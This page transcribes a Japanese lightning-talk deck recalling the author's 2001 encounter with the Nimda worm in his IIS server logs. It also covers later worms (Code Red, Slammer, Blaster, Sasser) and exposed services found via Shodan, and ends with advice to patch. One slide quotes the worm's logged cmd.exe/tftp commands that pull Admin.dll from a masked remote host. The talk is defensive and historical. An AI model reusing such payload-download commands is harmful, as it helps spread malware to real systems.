Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
あの頃(2000年頃)のインターネット / The Internet in the early...
Search
tkito
January 23, 2025
Technology
160
1
Share
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。
tkito
January 23, 2025
More Decks by tkito
See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
tkito
0
1.1k
Re: SQLiから始めるRCE生活 / RCE via SQLi
tkito
0
350
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
tkito
2
3.7k
Linuxでの権限昇格 / Privilege Escalation in Linux
tkito
0
1.1k
SOC-IRとOSCP / SOC-IR and OSCP
tkito
0
160
Other Decks in Technology
See All in Technology
AI時代の私の技術インプットとアウトプット術
tonkotsuboy_com
16
8.2k
Javaで学ぶSOLID原則
negima
1
260
個人AIからチームAIへ:開発における品質と生産性の再設計
moongift
PRO
0
360
自称宇宙最速で不合格となったAIP-C01にリベンジを果たすべくAIで問題集アプリを作ってみた。
yama3133
0
260
TROCCOで始めるクラウドコストを民主化するためのFinOps
tk3fftk
3
540
GoとSIMDとWasmの今。
askua
3
470
サプライチェーンセキュリティの空白地帯 - 信頼できる”依存性”の未来を考える
rung
PRO
2
630
「気づいたら仕事が終わっている」バクラクAIエージェント本番運用の裏側 / layerx-bakuraku-aie2026
yuya4
10
6.4k
エンジニアは生成AIと どのように向き合うべきか? ことばの意味という観点から
verypluming
3
320
Oracle AI Database@Azure:サービス概要のご紹介
oracle4engineer
PRO
6
1.8k
Generative UI × A2UI で AI エージェントを作った話 AI-DLC も使ってみた!
kmiya84377
1
310
Spring AI × MCP 入門〜AIエージェントへのツール公開、境界設計から始める最小構成 〜
yuyamiyamoto
0
200
Featured
See All Featured
Gemini Prompt Engineering: Practical Techniques for Tangible AI Outcomes
mfonobong
2
420
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
16
2k
The Straight Up "How To Draw Better" Workshop
denniskardys
239
140k
SEOcharity - Dark patterns in SEO and UX: How to avoid them and build a more ethical web
sarafernandez
0
190
Impact Scores and Hybrid Strategies: The future of link building
tamaranovitovic
0
300
AI: The stuff that nobody shows you
jnunemaker
PRO
7
680
What the history of the web can teach us about the future of AI
inesmontani
PRO
1
600
Statistics for Hackers
jakevdp
799
230k
<Decoding/> the Language of Devs - We Love SEO 2024
nikkihalliwell
1
230
Collaborative Software Design: How to facilitate domain modelling decisions
baasie
1
230
Mobile First: as difficult as doing things right
swwweet
225
10k
Measuring & Analyzing Core Web Vitals
bluesmoon
9
860
Transcript
あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう
自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり
2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット
あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます
私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •
ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀
事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5
Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理
- @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html
何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット
7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll
どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8
あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL
Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9
昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10
Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)
まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット
12
おしまい きとう @tkito 13
tkito
tonkotsuboy_com
negima
moongift
yama3133
tk3fftk
askua
rung
yuya4
verypluming
oracle4engineer
kmiya84377
yuyamiyamoto
mfonobong
reverentgeek
denniskardys
sarafernandez
tamaranovitovic
jnunemaker
inesmontani
jakevdp
nikkihalliwell
baasie
swwweet
bluesmoon
